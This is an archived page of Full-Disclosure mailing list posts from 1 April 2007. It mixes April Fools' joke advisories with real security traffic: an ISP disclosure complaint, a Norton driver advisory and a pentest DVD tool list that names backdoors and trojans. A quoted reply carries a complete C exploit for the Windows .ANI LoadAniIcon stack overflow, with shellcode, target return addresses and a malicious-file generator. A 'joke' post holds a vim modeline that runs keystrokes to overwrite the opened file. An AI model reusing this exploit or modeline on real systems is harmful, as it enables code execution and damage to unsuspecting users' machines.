J. Oquendo | 1 Apr 05:05 2007
Picon

Cisco IP Phone vulnerability

-----BEGIN LSD SIGNED MESSAGE-----

Infiltrated.net Security Advisory:
Cisco IP Phone Denial of Service
http://www.infiltrated.net/ciscoIPPhone7960.html
Revision 6.9

For Public Release

Summary
The Cisco IP Phones are subject to a denial of
service.

This vulnerability has not yet been documented
by Cisco but it should be allocated the bug ID
31337 by staff  <at>  PSIRT

This advisory will be posted at
http://www.infiltrated.net/ciscoIPPhone7960.html

Affected Products
All Cisco IP Phones

Proof of Concept
http://infiltrated.net/7960poc.jpg

Cisco Security Procedures
Complete information on reporting security
vulnerabilities in Cisco products, obtaining
assistance with security incidents, and
(Continue reading)

James Matthews | 1 Apr 05:58 2007
Picon

Re: Windows .ANI LoadAniIcon Stack Overflow

The issue is that this only works with DEP turned off!

On 3/31/07, dev code <devcode29 <at> hotmail.com> wrote:
I didn't include the DoS version of this, it just calls ExitProcess(). If
you have SP2, you can try going to http://sicotik.com/ink/test.html. Thanks.

>From: wac <waldoalvarez00 <at> gmail.com>
>To: "dev code" < devcode29 <at> hotmail.com>
>CC: full-disclosure <at> lists.grok.org.uk
>Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>Date: Sat, 31 Mar 2007 06:53:34 -0500
>
>Hello:
>
>Does this works in *fully patched* XP pro + SP2? Mine seems to be totally
>immune (not even crashing). XP  Pro + SP2 + 0 patches crashes (probably
>landing somewhere else in memory).
>
>
>On 3/30/07, dev code <devcode29 <at> hotmail.com> wrote:
>>
>>/*
>>* Copyright (c) 2007 devcode
>>*
>>*
>>*                       ^^ D E V C O D E ^^
>>*
>>* Windows .ANI LoadAniIcon Stack Overflow
>>* [CVE-2007-1765]
>>*
>>*
>>* Description:
>>*    A vulnerability has been identified in Microsoft Windows,
>>*         which could be exploited by remote attackers to take complete
>>*         control of an affected system. This issue is due to a stack
>>overflow
>>*    error within the "LoadAniIcon()" [user32.dll] function when rendering
>>*    cursors, animated cursors or icons with a malformed header, which
>>could
>>*         be exploited by remote attackers to execute arbitrary commands
>>by
>>*    tricking a user into visiting a malicious web page or viewing an
>>email
>>*    message containing a specially crafted ANI file.
>>*
>>* Hotfix/Patch:
>>*    None as of this time.
>>*
>>* Vulnerable systems:
>>*         Microsoft Windows 2000 Service Pack 4
>>*         Microsoft Windows XP Service Pack 2
>>*         Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
>>*         Microsoft Windows XP Professional x64 Edition
>>*         Microsoft Windows Server 2003
>>*         Microsoft Windows Server 2003 (Itanium)
>>*         Microsoft Windows Server 2003 Service Pack 1
>>*         Microsoft Windows Server 2003 Service Pack 1 (Itanium)
>>*         Microsoft Windows Server 2003 x64 Edition
>>*         Microsoft Windows Vista
>>*
>>*         Microsoft Internet Explorer 6
>>*         Microsoft Internet Explorer 7
>>*
>>*    This is a PoC and was created for educational purposes only. The
>>*         author is not held responsible if this PoC does not work or is
>>*         used for any other purposes than the one stated above.
>>*
>>* Notes:
>>*         For this to work on XP SP2 on explorer.exe, DEP has to be turned
>>*         off.
>>*
>>*/
>>#include <iostream>
>>
>>/* ANI Header */
>>unsigned char uszAniHeader[] =
>>"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
>>"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
>>"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
>>"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
>>"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
>>"\x61\x6E\x69\x68\xA8\x03\x00\x00";
>>
>>/* Shellcode - metasploit exec calc.exe ^^ */
>>unsigned char uszShellcode[] =
>>"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
>>"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
>>"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
>>"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
>>"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
>>"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
>>"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
>>"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
>>"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
>>"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
>>"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
>>"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
>>"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
>>"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
>>"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
>>"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
>>"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
>>"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
>>"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
>>"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
>>"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
>>
>>char szIntro[] =
>>"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
>>"\t\t\tdevcode (c) 2007\n"
>>"[+] Targets:\n"
>>"\tWindows XP SP2 [0]\n"
>>"\tWindows 2K SP4 [1]\n\n"
>>"Usage: ani.exe <target> <file>";
>>
>>typedef struct {
>>         const char *szTarget;
>>         unsigned char uszRet[5];
>>} TARGET;
>>
>>TARGET targets[] = {
>>         { "Windows XP SP2", "\xC9\x29\xD4\x77" },       /* call esp */
>>         { "Windows 2K SP4", "\x29\x4C\xE1\x77" }
>>};
>>
>>int main( int argc, char **argv ) {
>>         char szBuffer[1024];
>>         FILE *f;
>>
>>         if ( argc < 3 ) {
>>                 printf("%s\n", szIntro );
>>                 return 0;
>>         }
>>
>>         printf("[+] Creating ANI header...\n");
>>         memset( szBuffer, 0x90, sizeof( szBuffer ) );
>>         memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );
>>
>>         printf("[+] Copying shellcode...\n");
>>         memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
>>         memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1
>>);
>>
>>         printf("%s\n", argv[2] );
>>         f = fopen( argv[2], "wb" );
>>         if ( f == NULL ) {
>>                 printf("[-] Cannot create file\n");
>>                 return 0;
>>         }
>>
>>         fwrite( szBuffer, 1, 1024, f );
>>         fclose( f );
>>         printf("[+] .ANI file succesfully created!\n");
>>         return 0;
>>}
>>
>>_________________________________________________________________
>>Interest Rates near 39yr lows! $430,000 Mortgage for $1,399/mo - Calculate
>>new payment
>>
>>http://www.lowermybills.com/lre/index.jsp?sourceid=lmb-9632-18466&moid=7581
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
>>

_________________________________________________________________
Live Search Maps – find all the local information you need, right when you
need it. http://maps.live.com/?icid=hmtag2&FORM=MGAC01

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
alessandro salvatori | 1 Apr 06:07 2007
Picon

Re: Cisco IP Phone vulnerability

Hey it is still March 31st in CA!
-- 
A l  e   s    s     a      n       d        r         o
         S        a       l      v     a    t   o  r i

On 3/31/07, J. Oquendo <sil <at> infiltrated.net> wrote:
> -----BEGIN LSD SIGNED MESSAGE-----
>
> Infiltrated.net Security Advisory:
> Cisco IP Phone Denial of Service
> http://www.infiltrated.net/ciscoIPPhone7960.html
> Revision 6.9
>
> For Public Release
>
> Summary
> The Cisco IP Phones are subject to a denial of
> service.
>
> This vulnerability has not yet been documented
> by Cisco but it should be allocated the bug ID
> 31337 by staff  <at>  PSIRT
>
> This advisory will be posted at
> http://www.infiltrated.net/ciscoIPPhone7960.html
>
> Affected Products
> All Cisco IP Phones
>
> Proof of Concept
> http://infiltrated.net/7960poc.jpg
>
> Cisco Security Procedures
> Complete information on reporting security
> vulnerabilities in Cisco products, obtaining
> assistance with security incidents, and
> registering to receive security information from
> Cisco, is available on Cisco's website at
> http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
> All Cisco security advisories are available at
> http://www.cisco.com/go/psirt.
>
>
> Details
> Cisco IP Phones are subject to a denial of service.
> Users who disconnect their ethernet cables will
> lose their dial tones and their present call will
> drop as well as subsequent incoming calls.
>
> While the attack may be local at present time,
> security engineers Infiltrated Networks (a division
> of Fscker Inc. with no relation to Halliburton)
> are devising telekinetic attacks along with Miss
> Cleo in order to provide a working disconnection
> attack tool.
>
>
> Impact
> All your phone sex belongs to null 0
>
> Software Versions and Fixes
> The only fix is to plug your phone back into a PoE
> switch or plug in its power cord.
>
> Obtaining Fixed Software
> Infiltrated Networks and Fscker Inc. is offering
> its services at the low price of $1000.00 an hour
> in consulting fees to remedy this attack, with a
> 100 hour minimum retainer fee. In fact, for those
> seeking to purchase a PoC code of the mentioned
> vulnerability, contact us, we'll gladly take your
> milk money.
>
> Workarounds
> Don't unplug your phone. Don't unplug your PoE
> switches. Don't live in areas where electricity
> is sporadic. Don't play with matches, and don't
> drive while under the influence of anything that
> is currently mentioned at http://www.bumwine.com
>
> Exploitation and Public Announcements
> Infiltrated.net is not aware of any public
> announcements or malicious use of the
> vulnerability described in this advisory.
>
> This vulnerability was reported to us
> losers, by another bigger loser who wishes
> to retain his or her anonyminity out of
> fear of obtaining "Michael Lynn Disease"
> where a frivolous denial of service attack
> via litigation will ensue and weaken the
> immune system.
>
> Status of This Notice: FINAL
> This is a final Infiltrated.net advisory. Although
> we cannot guarantee the accuracy of all statements
> in this notice, we still passed it on to you the
> consumer knowing full well a cease and desist letter
> will be sent and added to our collection. All of the
> facts have however been checked to the best of our
> ability while not under the influence of Prozac,
> Valtrex, Valium, Lithium and lest we forget, weapons
> of mass destruction of which you will not find since
> we have them buried in the secret stash boxes of our
> Nissan, Lexus, WRX, and Cherokee alongside our Glocks.
>
>
> Revision History
> Revision 6.9            Initial public release
>
>
>
> This notice is Copyright 2007 by Infiltrated.net.
> This notice may be redistributed freely after the
> release date given at the top of the text,
> provided that redistributed copies are complete
> and unmodified, and include all date and version
> information. Pictures of your fiance, wife,
> girlfriend can be e-mailed to us if said
> individuals did not yet e-mail to us on their
> own. Infiltrated Networks, sil, and our oddball
> affiliates remind those on the security scene to
> keep it real.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Aviram Jenik | 1 Apr 07:18 2007

ISP in the UK Terminates Account after Full Disclosure

Short version:

beThere, a UK ISP distributed routers to customers with the telnet port open 
and a default administrator password. A bit embarrassing.
Sid, who discovered the hole, originally blogged about it on SecuriTeam blogs, 
which resulted in the ISP calling us within 24 hours to have Sid take down 
the password information (as if that can't be figured out by the average 
script kiddie), but a month and a half later the problem is still there. I 
guess we know where their priorities are.

What else didn't take them long to do? Terminating Sid's Internet account. 
Yeah, that'll teach him a lesson telling the world about security holes in 
beThere's service. Bad customer. Go bother someone else.

Oh, and the backdoor? Still there, thanks for asking.

My longer rant here:
http://blogs.securiteam.com/index.php/archives/860

And here's Sid's original disclosure:
http://blogs.securiteam.com/index.php/archives/826

- Aviram

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

I)ruid | 1 Apr 08:16 2007

CAU-2007-0001: Window Transparency Information Disclosure

                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/

                    Computer Academic Underground
                        http://www.caughq.org
                          Security Advisory 

===============/========================================================
Advisory ID:    CAU-2007-0001
Release Date:   04/01/2007
Title:          Window Transparency Information Disclosure
Application/OS: Windows made from silica or plastics
Topic:          Panes used in windows are usually transparent, allowing
                sensitive information to be observed from the outside.
Vendor Status:  Not Notified
Attributes:     Remote, Information Disclosure
Advisory URL:   http://www.caughq.org/advisories/CAU-2007-0001.txt
Author/Email:   I)ruid <druid (at) caughq.org> 
===============/========================================================

Overview
========

An information disclosure attack can be launched against buildings that
make use of windows made of glass or other transparent materials by
observing externally-facing information through the window.

Impact
======

Sensitive information stored on whiteboards, cork-boards, calendars,
post-it notes, or other medium which faces a window is susceptible to
being disclosed to a remote entity.

Affected Systems
================

1) Silica Windows

2) Plastic Windows

Technical Explanation
=====================

Silica-based (glass) windows have molecular structures that are very
random like a liquid yet retain the strong bond and rigidity of a solid.
Transparent and translucent plastic windows have molecular structures
wherein the long-chain molecules (polymers) in the plastic are made to
settle into a similarly random pattern.

These random patterned molecular structures have electrons that do not
absorb the energy of photons in the visible spectrum, thus allowing
visible light to traverse them.  This traversal of visible light allows
the human eye to observe an object through the window.

Solutions & Recommendations
==========================

1) Do not store sensitive information on any medium which faces a window.

2) Draw blinds or curtains over the vulnerable window so as to prevent
   remote observers from viewing any sensitive information.

3) Apply an opaquing layer to vulnerable windows.

Exploitation
============

Use the naked eye, binoculars, or a telescoping lens to peer through the
windows of your target building.  Locate information storing mediums such
as whiteboards, cork-boards, or post-it notes which face outward through
the window.  Read the medium's content.

References
==========

Howstuffworks "What makes glass transparent?"
  http://science.howstuffworks.com/question404.htm

Credits & Gr33ts
================

Computer Academic Underground
Prof. Julius Sumner Miller

--

-- 
I)ruid, C²ISSP
druid <at> caughq.org
http://druid.caughq.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
V Comics | 1 Apr 09:26 2007
Picon

April 1 joke

vim: foldmethod=expr:foldexpr=feedkeys("\\<esc>\\x3a%!cat\\x20-n\\<CR>\\<esc>\\x
3a%s/./\:)/g\\<CR>\\<esc>\\x3aq!\\<CR>"):

a

Ask a question on any topic and get answers from real people. Go to Yahoo! Answers.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Valery Marchuk | 1 Apr 11:59 2007
Picon

Maria Sharapova is a Cisco Certified Specialist

Maria Sharapova, one of the most famous tennis players, gained the CCIE 
status yesterday. More at http://www.securitylab.ru/news/extra/293608.php

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Larry Seltzer | 1 Apr 13:49 2007

Re: Windows .ANI LoadAniIcon Stack Overflow

>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the
Microsoft advisory
(http://www.microsoft.com/technet/security/advisory/935423.mspx).

Has anyone actually tested this with DEP on/off to be sure?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
larryseltzer <at> ziffdavis.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Norton Multiple insufficient argument validation of hooked SSDT function Vulnerability

Hello,

We would like to inform you about a vulnerability in Symantec Norton products.

Description:

Symantec Norton Personal Firewall hooks many functions in SSDT and in at least two cases it fails to
validate arguments 
that come from the user mode. User calls to NtCreateMutant and NtOpenEvent with invalid argument values
can cause system 
crashes because of errors in Norton driver SPBBCDrv.sys. Further impacts of this bug (like arbitrary code
execution in 
the kernel mode) were not examined.

Vulnerable software:

     * Norton Personal Firewall 2006 version 9.1.1.7
     * Norton Personal Firewall 2006 version 9.1.0.33
     * probably all versions of Norton Personal Firewall 2006, Norton Internet Security 2006 and other
products that use 
SPBBCDrv driver
     * possibly older versions of Norton Personal Firewall and Norton Internet Security

More details and a proof of concept including its source code are available here:
http://www.matousec.com/info/advisories/Norton-Multiple-insufficient-argument-validation-of-hooked-SSDT-functions.php

Regards,

--

-- 
Matousec - Transparent security Research
http://www.matousec.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Fred | 1 Apr 13:11 2007

Kcpentrix 2.0 is Out !!

Dear List,

The Kcpentrix Project was founded in May 2005 , KCPentrix 1.0 was liveCD
designed to be a standalone Penetration testing toolkit for pentesters,
security analysts and System administrators 

What's New in KcPentrix 2.0:

Now release 2.0 is a liveDVD, It features a lot of new or up to date
tools for auditing and testing a network, from scanning and discovering
to exploiting vulnerabilities

Kcpentrix is based on SLAX 5, a Slackware live Dvd

The Powerful modularity which Kcpentrix uses, allow us to easily
customize our version, and include whichever modules we need.

KCPENTRIX 2.0 is the most inovative and promising KCPENTRIX ever.
It switched to 2.6 kernel line. Zisofs compression was replaced by
SquashFS, which provides better compression ratio and higher read
speed. 

Tools Lis:
Server tools :
Mysql
PostgreSQL
apache
php
DNS
DHCP
FTP
SMTP
POP3
IMAP
SSH
TFTPD

Internet tools:
Skype
Fire fox
Gftp
Gaim

Arp:
arping-2.04
seringe
arp-sk
arpspoof

backdoors:
hbkdr.tar.gz
hbkdr.zip
sbd-1.37.tar.gz
ssheater-1.1.tar.gz
x86-linux-connectback.c
x86-linux-portbind.c

Bruteforce:
adsmb-0.3
adsnmp-0.1
brutus-0.9.2
crackcvspass-v0.1
john-1.7.2
Online_Rainbow
onesixtyone-0.3.2
nat-1.0.4
mdcoll
lodowep
SIPcrack-0.1
smbat
TFTP-bruteforce
VNCcrack-0.9.1
wyd
crunch
md5crack.pl
ophcrack
thc-pptp-bruter
vncrack

cisco:
brute-enable-v.1.0.2
cisco-auditing-tool-v.1.0
cisco-global-exploiter
cisco-scanner-v.1.3
cisco-torch-0.4b
ciscopack
copy-router-config-v.0.1
eigrp-tools
ios-w3-vul
ios7decrypt-v.1.1
jitney-0.10

database:
sqlbrute.py
bsqlbf.pl
mysql_bftools
metacoretex-0.8.0
oat
oscanner_bin
checkpwd
sidguess
tnscmd10g.pl
bfora.pl
dbcool_audit.pl
oracletest.pl
tnsprobe.sh
oracle-scanner-v.1.0.6
oracle-dump-sids-v0.0.1
oat-v.1.3.1

enumeration:
dnswalk
DNSBruteforce.py
dns-ptr
dnsenum
dnsmap
dns-predict-v.0.0.2
fingergoogle-1.1
googrape-v.0.1
gooscan-v0.9
goog-mail.py
qgoogle.py
google-search
dnspython-1.3.2
dnslib.py
httplib.py
inet-enum.py
isr-form-1.0
ldap-enum-v.003
ldapbrowser
list-urls
lsrtunnel-0.2.1
mibble-2.6
mibble-2.7
nmbscan-1.2.4
nstx
relayscanner
revhosts
smb-enum
smtp-vrfy
snmpenum.pl
httprint_301

exploits:
client-side
exploit-tree
framework-2.5
framework-2.6
framework-2.7
framework3 Beta
framework-3.0
microsoft
milw0rm
packetstorm
secfocus
win32 Bin’s

Firewall:
ftester-1.0
Morena
hping2

forensics:
autopsy-2.06
sleuthkit
sleuthkit-2.03

Fuzzers:
bed
bed-v.0.5
cirt-fuzzer
clfuzz
fuzzer-1.1
fuzzer-1.2
fuzzer-mod
mistress
Peach
pirana-0.2.1
snmp-fuzzer-0.1.1
spike

IDS:
nemesis
snort
ossec

misc-tools:
find_ddos3.1
fping-2.4b2
ipgenv2

printer:
hijetter
pft

proxies:
3proxy_0_5_2
paros
penproxy-0.4.10

scanners:
banshee-3.3
dcom_scanner
hydra-5.3
knocker-0.7.1
lsrscan-1.0
ike-scan
amap
nikto-1.35
pbnj
nbtscan
nmap
nmapfe
sinfp.pl
VNC_bypauth

Sniffers:
aimsniff-0.9d
aimsniff-1.0beta
PHoss
xspy
dsniff
p0f
wireshark

spoofing:
netsed

tunnelling:
3proxy
iodine-0.3.2
proxytunnel-1.6.3

Web:
asp-audit
metoscan04
proxyfinder-1.0
sqlibf
sqlinject-1.1
wal
easy-scraper.pl
hacker_webkit.tar.gz
mysql-miner.pl
put.pl

wireless:
aircrack-2.2-beta1
aircrack-ng-0.6.2
airpwn-1.3
airsnarf-0.2
asleap-1.4
wifitap
hotspotter-0.4
fakeap-0.3.2
cowpatty-2.0
wep_crack
wep_decrypt

windows-binaries:
- databases :
Absinthe-1.4.1-Linux
sqlexec20.exe

-Misc :
enumplus
exe2bat.exe
Fport.exe
klogger.exe
mbenum.exe
radmin.exe
plink.exe
nc.exe
nbtenum.exe
mstsc.exe
regdmp.exe
sbd.exe
tftpd32.exe
vnc-ssh
vncviewer.exe
WHOAMI.EXE
wget.exe
- pstools
pstoreview.exe
pssuspend.exe
psshutdown.exe
psservice.exe
pskill.exe
pslist.exe
psloggedon.exe
psloglist.exe
pspasswd.exe
Psinfo.exe
psgetsid.exe
psfile.exe
psexec.exe
- passwd-attack:
ipcscan
lbrute
smbcrack2
cachedump
FindPass.exe
pulist.exe
PWDump4.exe
SAMDUMP.EXE
tsgrinder-2.03.zip
TSgrinder.rar
-Scanners :
hscan
ipcscan
languard
ntscangui
retina-scanners
DSScan.exe
dfind.exe
CIScan.exe
X-Scan-v2.3-en
superscan
gdiscan.exe
HS_WINS
MS05039Scan.exe
MyDoomScanner.exe
SQLScan.exe
SNScan.exe
sl.exe
RPCScan2.exe
NetSchedScan.exe
SynScan
-sniffers
rawsniffer
ngrep.exe
-trojans :
sbd.exe
Institution_2004.zip
-vpn:
ike-scan
ikeprobe

Thanks to all beta testers and supporters,
special thanks to the friends from Security-database.com and
SecurityDistro.com

You can Download the iso  <at>  Kcpentrix.com / knowledgecave.com and
Securitydistro.com.

Best regards,
Fred aka HC

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Gmane